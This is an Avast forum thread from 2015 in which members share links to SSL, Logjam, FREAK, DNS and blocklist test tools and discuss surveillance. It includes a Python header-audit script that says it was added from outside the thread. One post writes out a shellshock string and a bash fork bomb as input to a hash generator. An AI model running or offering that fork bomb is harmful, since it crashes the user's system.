Blocked URL: http://webdbg.com/test/xss/HelloBlockMode.asp?lotsoX=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx etc.

D

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2015, 01:23:24 AM
With voices heard to legalize mass surveillance at least until 2020, here is an interesting website with projects to opt out (where and while still possible) -> https://prism-break.org/en/
Quote
Disclaimer: Using the recommended projects on this site will not guarantee that 100% of your communications will be shielded against surveillance states. Please do your own research before trusting these projects with sensitive information.
Disclaimer quote taken from above website. Link source - Peng Zhong 2015.

polonus

P.S. A weird test result: https://en.wikipedia.org/wiki/Intelligence_Quotient_%28IQ%29_and_Browser_Usage

D
Title: Re: Tests and other Media topics
Post by: polonus on May 12, 2015, 07:07:01 PM
Open port check tool: http://www.yougetsignal.com/tools/open-ports/
The open port checker is a tool you can use to check your external IP address and detect open ports on your connection. This tool is useful for finding out if your port forwarding is setup correctly or if your server applications are being blocked by a firewall. This tool may also be used as a port scanner to scan your network for ports that are commonly forwarded. It is important to note that some ports, such as port 25, are often blocked at the ISP level in an attempt to prevent malicious activity.
Combine with a Dazzlepod IP check: https://dazzlepod.com/ip/

Mind that the results can only be for IPs you own and you cannot publish third party scan results.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2015, 11:51:12 PM
A short survey of IP blocklists:

https://atlas.arbor.net/
http://support.clean-mx.de/clean-mx/viruses
http://www.cymru.com/Documents/bogon-dd.html
http://www.dshield.org/ipsascii.html
http://www.emergingthreats.net/index.php/rules-mainmenu-38.html
http://code.google.com/apis/safebrowsing/
http://hosts-file.net/
http://malc0de.com/database/
http://www.malwaredomains.com/wordpress/?page_id=66
http://www.malware-control.com/
http://malwared.ru/database.php?page=1
http://www.malwaredomainlist.com/hostslist/hosts.txt
http://www.malware.com.br/lists.shtml
http://www.malwareurl.com/
http://www.norse-corp.com/darklist.html
http://openphish.com/
http://mdl.paretologic.com/
http://www.phishtank.com/phish_archive.php
http://www.projecthoneypot.org/list_of_ips.php
http://www.scumware.org/
http://www.shadowserver.org/wiki/pmwiki.php?n=Services/Reports
http://labs.snort.org/iplists/
http://mtc.sri.com/
http://sucuri.net/?page=tools&title=blacklist
http://www.threatstop.com/
http://urlblacklist.com/
https://zeustracker.abuse.ch/blocklist.php
https://zeustracker.abuse.ch/monitor.php?browse=binaries
http://www.blade-defender.org/eval-lab/
https://malwr.com/
http://www.nictasoft.com/viruslib/   

(link source credits go to CWZ)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2015, 12:01:08 AM
Another good initiative with https being phased in: https://sslbl.abuse.ch/

Also some interesting SSL checking links given.
Like to add:
https://ssl.trustwave.com/support/support-certificate-analyzer.php?address=
https://www.whynopadlock.com/
https://certlogik.com/ssl-checker/www.reddit.com/
https://www.poodlescan.com/
https://shaaaaaaaaaaaaa.com/
https://www.trustworthyinternet.org/ssl-pulse/
https://pentest-tools.com/vulnerability-scanning/openssl-heartbleed-scanner

polonus

Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2015, 10:35:30 PM
Real World Protection Test Results, download here: http://www.av-comparatives.org/wp-content/uploads/2015/05/avc_factsheet2015_04.pdf

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 18, 2015, 12:11:35 AM
Next to this DNS scanner: http://www.dnsinspect.com/stabletransit.com/1431899954
I stumbled upon this one: http://www.nabber.org/projects/dnscheck/?domain=stabletransit.com *
Both can be nicely combined when you dive into some DNS issue.
So I tried to get scan results with stealth nameservers *.
Read: https://support.dnsmadeeasy.com/index.php?/Knowledgebase/Article/View/108/16/why-am-i-getting-these-stealth-name-server-errors-and-warnings link article author Jennifer Oles
Stealth name servers should never be listed as authoritative!
* This scan was started because of this report: http://toolbar.netcraft.com/site_report?url=http://sbdforms.com
and the Nameserver given there.

My good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2015, 06:23:44 PM
Generate hashes online with this generator: http://www.sha1-online.com/
Example: $ echo -n \`\^\-\,\;\:\!\?\.\'\"\(\)\[\]\{\}\§\@\*\/\\\&\#\%\±\<\=\>\|\~\$\€ | openssl sha1
Output: f44e3004f07d617b06f61b57803a7abe30d414fd  (shellshock bash bug)

fork bomb () { :; }; :(){ :|: & };: -> 57785764f85505a15dd38ea7ffab35bc43512136
Result for md5:  8cf37ff23da0423b9c167dc05b6217ea

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 07:04:35 AM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

Big Blue now safe, Firefox and Google Chrome still unpatched.
Due to the weakened export downgraded encryption (USA export encryption restrictions during the 90's and beyond caused this threat) Logjam is now a problem to be mitigated all over the world.
Server test can be found here: https://weakdh.org/sysadmin.html

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 02:01:28 PM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

Big Blue now safe, Firefox and Google Chrome still unpatched.
Due to the weakened export downgraded encryption (USA export encryption restrictions during the 90's and beyond caused this threat) Logjam is now a problem to be mitigated all over the world.
Server test can be found here: https://weakdh.org/sysadmin.html (https://weakdh.org/sysadmin.html)

polonus
It's actually the cyber crook that caused this problem. It's their exploitation of this 'weakness' that's the problem. :) (I'm being sarcastic.)
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 03:46:43 PM
Hi bob3160,

And did not government promise recently they would no longer sit on these hacks, but to reveal them to us?  ;D

All your weakened encrypted traffic could be easily siphoned and decrypted by design, alas large parts of that traffic.
Read: http://www.dailydot.com/politics/logjam-vpn-top-sites-vulnerability/

UC Browser, very popular in China was deliberately being infested by NSA etc.: https://citizenlab.org/2015/05/a-chatty-squirrel-privacy-and-security-issues-with-uc-browser/

Intelligence services "helped" general internet security big time during recent years with their paranoia (ironic and sarcastic remark)  :()

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on May 21, 2015, 04:12:16 PM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

<snip>
polonus

I think the key (excuse the pun) here is might and being broken by a nation-state. When it comes to nation states, they might have the resources to break it, but you would have to wonder, would they want to? I'm sure this type of stuff would have to be attractive enough to make it worthwhile.
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 04:35:54 PM
Hi DavidR,

That is not the point here, whether government had the might to decrypt weakened encryption for global surveillance purposes. I understand we normally don't do that in our homes. The point is that it was done deliberately by having stronger encryption restrictions for everyone abroad and downgrading the initial encryption strength to be able to decrypt.
Particular governments and big corporation entities worked hand in foot to achieve such a situation.

Who was asking for normal secure encryption strength to be deliberately and secretly lowered to an extent so that eavesdropping mode could be reached. Those with strong encryption were not endangered in the first place (cybercriminals etc.), the security of the normal law-abiding citizen was endangered big time and these citizens weren't aware.

Now webmail and webserver admins all over the world have to clear up the mess after some parties could realize their global surveillance wet dreams, and parts of the internet will stay inherently insecure and dangerous in the aftermath.
Big Brother has arrived and he will never go away again.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 09:17:01 PM
Quote
Big Brother has arrived and he will never go away again.
Big Brother has been there since 2007 so this certainly isn't new.
Almost all the surveys I've read also confirm that most people don't care.
It's only some of the Geeks that seem to get their feathers ruffled any time one of these articles comes out. :)
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 11:05:20 PM
Hi bob3160,

Geeks or no geeks, it seems general security awareness is at an ever low ebb today. As you said it right, bob3160, the common user isn't interested that much. However some parties could do a much better job.. Education is where to start - we let toddlers have a smartphone or tablet very early in life. They can work it before they have even learnt to ride a little bike.

But we have also to educate others. Users to better protect themselves and website owners and hosters and server- and CMS-admins to better implement with security at heart. Our modern society as a whole and our very cybersecurity depends on it.

We should not want to tolerate insecure scripting anymore, not tolerate excessive header version info spreading to the world and hackers and attackers alike. No longer tolerate parties not to run latest updates and patches, configure the available header security in a way that is called best practices, not offer encryption from the weak end up, so cybercriminals and government entities can do their self-assigned deals.

Isn't there a better or more noble task for avast support than to educate with security at heart for a safer and more secure internet. I like to be part of such a benevolent mission and have been in the past years thanks to Avast creating an opportunity to do so and add to user security. Yes and I am a proud Avast user and I have the best deals for Avast and Avast's friends at heart. Let us stand together and on the good side always.

polonus (volunteer website security analyst and website error hunter).
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 11:58:15 PM
Quote
Education is where to start
I'm now in my 5th year of doing exactly that through the Avast sponsored security presentations (https://forum.avast.com/index.php?topic=78426.msg647360#msg647360). :)
Another way Avast is helping keep computer users secure and a bit more educated. :) The service is also totally free.
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 12:51:49 AM
We all thank you for that, bob3160!
Users should have such pitch days!
These forums brought us a lot.
I am grateful.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 02:21:37 PM
Logjam workaround for firefox:
Until patched you can:

Disable the insecure ciphers here:

(1) In a new tab, type or paste about:config in the address bar and press Enter. Click the button promising to be careful.

(2) In the search box above the list, type or paste ssl3 and pause while the list is filtered

(3) Double-click the security.ssl3.dhe_rsa_aes_128_sha preference to switch it from true to false (this usually would be the first item on the list)

(4) Double-click the security.ssl3.dhe_rsa_aes_256_sha preference to switch it from true to false (this usually would be the second item on the list)

That's it, you can test using: https://www.ssllabs.com/ssltest/viewMyClient.html

Credits go to MozillaZine's jscher2000

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 04:40:42 PM
Always surf encrypted via: https://encrypted.google.com/
See: http://toolbar.netcraft.com/site_report?url=https://encrypted.google.com
Issues: https://foundeo.com/products/iis-weak-ssl-ciphers/test.cfm?test_domain=encrypted.google.com
Good News! This site is safe from the Logjam attack. It supports ECDHE, and does not use DHE.
IP   Connected   TLS   Insecure DHE_EXPORT   DHE   Chrome
216.58.216.238         No   
Not Supported

ECDHE
2607:f8b0:4009:809::200e      

But vulnerable to Poodle:       Scan results
GOOGLE.COM:443 (216.58.219.206) - VULNERABLE   

Startpage SSL xpi can no longer be installed under Firefox (ESR) 38: broken.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 07:20:23 PM
HSTS Preloading: https://scotthelme.co.uk/hsts-preloading/
link article author = Scott Helme.
https://blog.nvisium.com/2014/04/is-your-site-hsts-enabled.html
It being a double-edged sword: https://www.leviathansecurity.com/blog/the-double-edged-sword-of-hsts-persistence-and-privacy/
Also read here: http://stackoverflow.com/questions/10629397/how-to-disable-http-strict-transport-security
Already included: http://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json
Included there is no guarantee for security: -braintreegateway.com -> Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.
IP   Connected   TLS   Insecure DHE_EXPORT   DHE   Chrome
204.109.13.100         No   Common 1024-bit Prime   ECDHE
The security header configuration for this site also has a lot of issues, see attached.

polonus
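As an added example, not code from the thread or from the linked articles: a Python audit of the three response headers discussed in this post and in the X-XSS-Protection post above (Strict-Transport-Security with the directives preloading needs, X-Frame-Options, X-XSS-Protection), run over two constructed header sets. The one-year max-age threshold is an assumption taken from the preload submission requirements, and the header values are invented for the demonstration.

```python
from typing import Dict, List

# Assumed preload threshold: the preload list asks for a max-age of at least one year.
PRELOAD_MIN_MAX_AGE = 31536000


def parse_hsts(value: str) -> Dict[str, str]:
    """Split 'max-age=31536000; includeSubDomains; preload' into a
    lower-cased directive -> value map (valueless directives map to '')."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    return directives


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings for one HTTPS response's headers."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    # X-XSS-Protection: the IE8+ reflected-XSS filter. "0" switches it off;
    # without mode=block the filter rewrites the page instead of refusing to render it.
    xss = h.get("x-xss-protection")
    if xss is None:
        findings.append("X-XSS-Protection missing: browser default applies")
    elif xss.strip().startswith("0"):
        findings.append("X-XSS-Protection: 0 disables the reflected-XSS filter")
    elif "mode=block" not in xss.replace(" ", "").lower():
        findings.append("X-XSS-Protection lacks mode=block: filtered page is still rendered")

    # X-Frame-Options: what the clickjacking test earlier in the thread looks for.
    xfo = h.get("x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing: page can be framed (clickjacking)")
    elif (xfo.strip().upper() not in ("DENY", "SAMEORIGIN")
          and not xfo.strip().upper().startswith("ALLOW-FROM ")):
        findings.append(f"X-Frame-Options has unrecognised value {xfo!r}")

    # Strict-Transport-Security: needed for HSTS at all; preloading needs all three directives.
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("Strict-Transport-Security missing: http:// links to this host are not upgraded")
    else:
        d = parse_hsts(hsts)
        try:
            max_age = int(d.get("max-age", ""))
        except ValueError:
            max_age = -1
        if max_age < 0:
            findings.append("Strict-Transport-Security has no valid max-age")
        elif max_age < PRELOAD_MIN_MAX_AGE:
            findings.append(f"HSTS max-age={max_age} is below the assumed one-year preload minimum")
        if "includesubdomains" not in d:
            findings.append("HSTS lacks includeSubDomains (required for preloading)")
        if "preload" not in d:
            findings.append("HSTS lacks the preload directive (required for the preload list)")
    return findings


# Constructed header sets: a weak configuration and the hardened one.
WEAK_HEADERS = {
    "X-XSS-Protection": "0",
    "Strict-Transport-Security": "max-age=10886400",
}
HARDENED_HEADERS = {
    "X-XSS-Protection": "1; mode=block",
    "X-Frame-Options": "SAMEORIGIN",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload",
}

if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(f"{name}: {audit_headers(hdrs) or ['no findings']}")
```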
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 12:29:19 AM
Another test site and another test to take:
Safe.

We have examined your OS and browser version information and determined that an active vulnerability test was appropriate. Fortunately, your browser correctly aborted loading our test image upon seeing an invalid ServerKeyExchange message.

https://gotofail.com/#
And here: https://www.howsmyssl.com/
Verdict: Probably OK (not tested here: Logjam Vulnerability (Experimental))
Your user agent is vulnerable. Upgrade as soon as possible.
But we do not have an update yet, hurry up Google developers,
because criminals on coffee-shop Wi-Fi networks are also abusing Logjam and not only state actors!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 03:25:50 PM
Logjam mitigating efforts and tests: https://news.ycombinator.com/item?id=9574408
Is avast VPN patched? Update your VPN Server: VPN servers that support IKEv1 protocol for encryption should be updated to disable any keysize less than 1024 bits – or better yet, use elliptical curve keys. Organizations should also consider using SSL VPN technology, which is better supported as its underlying OpenSSL is updated regularly against various encryption protocol vulnerabilities.
Read about affected Cloud Services: https://www.skyhighnetworks.com/cloud-security-blog/logjam-exposed-575-cloud-services-potentially-vulnerable-to-man-in-the-middle-attacks/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 07:46:26 PM
In the light of all the recent data breaches it is a good thing to test here:
https://haveibeenpwned.com/
Sometimes one can/could get a "Oh.no catastrophic failure!".

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 25, 2015, 12:55:11 AM
Still around Freak vulnerability
However, even if your browser is safe, certain third-party software, including some anti-virus products and adware programs, can expose you to the attack by intercepting TLS connections from the browser. If you are using a safe browser but our client test says you’re vulnerable, this is a likely cause.
Test here: https://freakattack.com/clienttest.html
Read: https://freakattack.com/
You can also test here (freak test included) - all not on IE are vulnerable to logjam: https://www.ssllabs.com/ssltest/viewMyClient.html

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 12:47:18 PM
Check your client against FREAK: https://freakattack.com/clienttest.html
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations
Server test: https://www.ssllabs.com/ssltest/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 26, 2015, 01:41:02 PM
Check your client against FREAK: https://freakattack.com/clienttest.html (https://freakattack.com/clienttest.html)
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations (https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations)
Server test: https://www.ssllabs.com/ssltest/ (https://www.ssllabs.com/ssltest/)

polonus
Must have learned something over the years. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1432640423513-4078.png)
Title: Re: Tests and other Media topics
Post by: Lisandro on May 26, 2015, 10:07:00 PM
Mine passed too. I must have learned from Bob  :D
Title: Re: Tests and other Media topics
Post by: DavidR on May 26, 2015, 10:18:57 PM
Check your client against FREAK: https://freakattack.com/clienttest.html
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations
Server test: https://www.ssllabs.com/ssltest/

polonus

I haven't changed a thing and mine doesn't fail nor does it pass as the site can't even run the test unless I allow NoScript for the site and allow RequestPolicy (continued) for the three other sites.

Only when I give implicit permission does the test run and complete and record "Good News! Your browser appears to be safe from the FREAK attack. "

This is why I rarely bother with these types of tests because of my locked down setup with NoScript and RequestPolicy it isn't going anywhere to test. The same should be correct for a live incident.
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 10:46:25 PM
Hi DavidR,

Only minus here is that for logjam and freak NoScript and RequestPolicy do not protect.
You cannot be protected by either NoScript or RequestPolicy against RSA vulnerabilities.
You should be glad that you have checked the test that was provided here, seen in the line of SSL-weakening that is brought about by many an AV https-scan; read from someone who is concerned and where AV https scanning made users vulnerable to the FREAK attack as we test: https://blog.hboeck.de/archives/869-How-Kaspersky-makes-you-vulnerable-to-the-FREAK-attack-and-other-ways-Antivirus-software-lowers-your-HTTPS-security.html  link article author = Hanno Böck
Why AV https scanning does not perform certificate-pinning - why? Read here: https://wiki.mozilla.org/SecurityEngineering/Public_Key_Pinning

polonus (trust what you test yourself)

To read Avast's official reaction from Deborah Salmi: https://blog.avast.com/2015/05/25/explaining-avasts-https-scanning-feature/

D
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 11:18:36 PM
Certificate pinning is done in Firefox by the Certificate Patrol add-on: http://patrol.psyced.org/
Read here for background info: https://security.stackexchange.com/questions/16293/how-can-end-users-detect-malicious-attempts-at-ssl-spoofing-when-the-network-alr
Test: https://www.networking4all.com/en/support/tools/csr+check/
Quote
In Google Chrome: Accessing Certificates Via Address Bar
You can also view an SSL certificate directly from the address bar. Click on the padlock icon to the right of the website's address and then click the "View Certificate" link. The Certificate dialog box will open. Information about the SSL certificate appears immediately. Click the "Details" tab to view specific details, including encryption method, serial number and if the certificate is valid and then click "OK" to close the Certificate dialog box.
Quoted Info credits go to Nick Davies.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2015, 01:01:23 AM
Passed the Qualys Browser check for my pre-release version of Google Chrome browser:  ;D

Installed Version: 43.0.2357.81
Stable Version: 42.0.2311.152
Quote
Congratulations! You passed Qualys BrowserCheck.
We recommend you scan your browser regularly to stay up to date with the latest versions and plugins.

polonus

P.S. The logjam vulnerability will be patched with version 45.
Title: Re: Tests and other Media topics
Post by: polonus on May 29, 2015, 01:01:05 PM
Cybersecurity tool Domain Tracker by Xen0ph0n: http://www.dtrackr.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 11:52:37 AM
Check whether your router is secure: https://campaigns.f-secure.com/router-checker/

No issues were found

All is well. Have a nice day!

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 02:40:00 PM
Check whether your router is secure: https://campaigns.f-secure.com/router-checker/ (https://campaigns.f-secure.com/router-checker/)

No issues were found

All is well. Have a nice day!

polonus
Using the "Scan for Network Threats" function in Avast also tells you that and a lot more. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1433075733700-37611.png)


(http://www.screencast-o-matic.com/screenshots/u/Lh/1433075984216-72670.png)
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 02:47:32 PM
The home computer with Avast on it is at home, gonna compare it when back home. ;D

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 06:25:07 PM
The home computer with Avast on it is at home, gonna compare it when back home. ;D

pol
I take my Avast with me wherever I go. :)
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 06:29:18 PM
Hi bob3160,

Have to convince the neighbours here to install avast then,
but I have avast  always on my smartphone.

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 06:33:30 PM
Hi bob3160,

Have to convince the neighbours here to install avast then,
but I have avast  always on my smartphone.

pol
Since I have no problem convincing total stranger to do that on a regular basis, persuading a neighbor shouldn't be a problem for you. :)
Title: Re: Tests and other Media topics
Post by: polonus on June 12, 2015, 05:33:56 PM
L.S.

What browser extensions are violating your privacy by selling de-anonymized and geo-location-rich user info to third parties?
Aggregated info with anonymized, non-reconstructable user info and without reconstructable geo-location info is not considered a violation as such, as you agreed to it by installing a free extension. Test with Extension Defender or through the Avast Privacy Module.
Read also https://blog.torproject.org/blog/tor-browser-45-released as the Disconnect Search add-on was accused of such alleged abuse.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 13, 2015, 07:48:54 PM
Code to permanently block AdMob ads
Code: [Select]
// Both snippets are fragments that live inside the Activity whose layout holds the AdMob view.
import android.view.View;
import android.widget.LinearLayout;
import com.google.android.gms.ads.AdView;

// Option 1 (e.g. inside an "if" block): remove the ad view from its container.
LinearLayout adsContainer = (LinearLayout) findViewById(R.id.adsContainer);
View admobAds = findViewById(R.id.admobAds);
adsContainer.removeView(admobAds);

// Option 2: disable and hide the AdView; view changes must happen on the UI thread.
private void hideAd() {
    final AdView adLayout = (AdView) findViewById(R.id.adView1);
    runOnUiThread(new Runnable() {
        @Override
        public void run() {
            adLayout.setEnabled(false);
            adLayout.setVisibility(View.GONE);
        }
    });
}
credits go to Quartertone & Chris Dryden

polonus

Title: Re: Tests and other Media topics
Post by: polonus on June 15, 2015, 12:26:46 PM
Will HTTPS be securing access to Wikimedia? Re: https://blog.wikimedia.org/2015/06/12/securing-wikimedia-sites-with-https/
Read: https://en.wikipedia.org/wiki/Censorship_of_Wikipedia
Quote
To perform the 'Website Test behind the Great Firewall of China', the monitoring agent resolves the domain name from selected location in China, connects to the test website and downloads the complete HTML content. The test results display DNS lookup time, time to connect, time to download the first byte and time to download the complete HTML of the tested web site. The total response time shows how long it takes for your website to download.
-> http://www.websitepulse.com/help/testtools.china-test.html
Tested From:   Shanghai, China
Tested At:   2015-06-15
10:24:51 (GMT +00:00)
URL Tested:   https://blog.wikimedia.org/2015/06/12/securing-wikimedia-sites-with-https/
Resolved As:   192.0.79.33
Status:   OK
Response Time:   22.845 sec
DNS:   14.009 sec
Connect:   1.085 sec
Redirect:   0.000 sec
First Byte:   2.629 sec
Last Byte:   5.122 sec
Size:   52685 bytes

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2015, 12:00:26 PM
Avast's latest real world test results: http://chart.av-comparatives.org/chart1.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2015, 06:31:37 PM
Patch logjam vulnerability in Google Chrome with SSL Locker: https://ssllocker.com/download.html

First download the latest version of Chrome or update to at least Chrome ver 41.
When using the latest Chrome and ChromeLocker, POODLE, FREAK, Bar Mitzvah, Logjam
and other MiTM vulnerabilities are mitigated.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2015, 06:13:23 PM
Re: http://d3xt3r.com/dashboard?check_ip=117.169.1.165
Blacklisted and spammer: https://www.stopforumspam.com/ipcheck/117.169.1.165
and http://www.ip-finder.me/117.169.1.165/
and http://www.projecthoneypot.org/ip_117.169.1.165
and here: http://www.blocklist.de/en/view.html?ip=117.169.1.165
and http://www.liveipmap.com/117.169.1.165
and here: https://cleantalk.org/blacklists/117.169.1.165
and http://ozzed.net/spamburp/Index.asp?page=1&sort=8
and (not safe): htxps://fspamlist.com/index.php?c=latest

polonus

And a check and test site as bonus:
http://www.check-and-secure.com/portcheck/_en/
http://www.check-and-secure.com/ipcheck/_en/solution/clean.php

D
Title: Re: Tests and other Media topics
Post by: polonus on June 22, 2015, 04:25:14 PM
A proxy could mean a threat, because of (alleged) traffic manipulation.
The use of one is therefore not advisable. Anyway, some do...
Check proxies here: https://proxycheck.haschek.at/
And: http://urlchecker.org/proxy
See: http://proxyipchecker.com/
Read: https://blog.haschek.at/post/fd9bc

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2015, 04:36:12 PM
User Agent track site: http://www.botsvsbrowsers.com/SimulateUserAgent.asp
Toggle -> https://www.dephormation.org.uk/?page=81
Test your browser for trackability: https://panopticlick.eff.org/
User Agent Switcher for Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2015, 10:49:12 AM
Question? How can I check whether Google Translate Chinese is working correctly?
There is a big difference in Chinese between brother (either "big brother" or "little brother"); with sister there is a similar difference, with additional strokes. How can I check it works correctly?
I was a proctor at an exam in Mandarin Chinese and now just curious...

Anyone.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on June 25, 2015, 01:16:35 PM
Question? How can I check whether Google Translate Chinese is working correctly?
Only native speakers can answer that, you could ask in the Chinese section of the forum.

Groetjes,
Asyn
Title: Re: Tests and other Media topics
Post by: bob3160 on June 25, 2015, 01:17:17 PM
Question? How can I check whether Google Translate Chinese is working correctly?
There is a big difference in Chinese between brother (either "big brother" or "little brother"); with sister there is a similar difference, with additional strokes. How can I check it works correctly?
I was a proctor at an exam in Mandarin Chinese and now just curious...

Anyone.

polonus
See if this does the trick for you:
http://www.word2word.com/free.html (http://www.word2word.com/free.html)
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2015, 04:56:55 PM
Test your IP version 6 readiness here: http://ip6.nl/

Another test: do the vulnerability test on the jQuery version of a webpage: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003 - http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003

A JQuery bookmarklet - http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/
It's a nice little tool that allows you to play around with jQuery on a page that doesn't already have jQuery loaded and see the results immediately - either "This page is now jQuerified" or "This page was already jQuerified."

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 04, 2015, 05:38:13 PM
Test your IP version 6 readiness here: http://ip6.nl/ (http://ip6.nl/)

Another test: do the vulnerability test on the jQuery version of a webpage: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003 (http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003) - http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003 (http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003)

A JQuery bookmarklet - http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/ (http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/)
It's a nice little tool that allows you to play around with jQuery on a page that doesn't already have jQuery loaded and see the results immediately - either "This page is now jQuerified" or "This page was already jQuerified."

polonus
(http://www.screencast-o-matic.com/screenshots/u/Lh/1436024235780-73631.png)
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 04, 2015, 07:55:50 PM
Introducing Free Global Website Performance Tool

https://blog.sucuri.net/2015/05/introducing-free-global-website-performance-tool.html?utm_campaign=Performance%20Tool&utm_content=17556994&utm_medium=social&utm_source=googleplus

How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2015, 01:57:45 PM
Problems with your Internet connection?
There is something you could do for starters, that is, test it:
[Windows-key]+r key combination -> cmd.exe (in admin mode only, else you are not allowed to flushdns)
nslookup www.quantum.com    (your provider's address - just a random example)
ipconfig /flushdns
nslookup www.quantum.com 8.8.8.8

Report to a qualified remover, here for instance, what results you got for the 2 nslookup commands.
Of course you could test another DNS entry; do so by all means, preferably one that gives DNS issues/problems for you (in Internet Explorer). Info credits go to Tijs, Tera Honourable Senior Member

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2015, 04:51:38 PM
Run your code through the sniffer here: http://squizlabs.github.io/HTML_CodeSniffer/

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 06, 2015, 09:30:04 PM
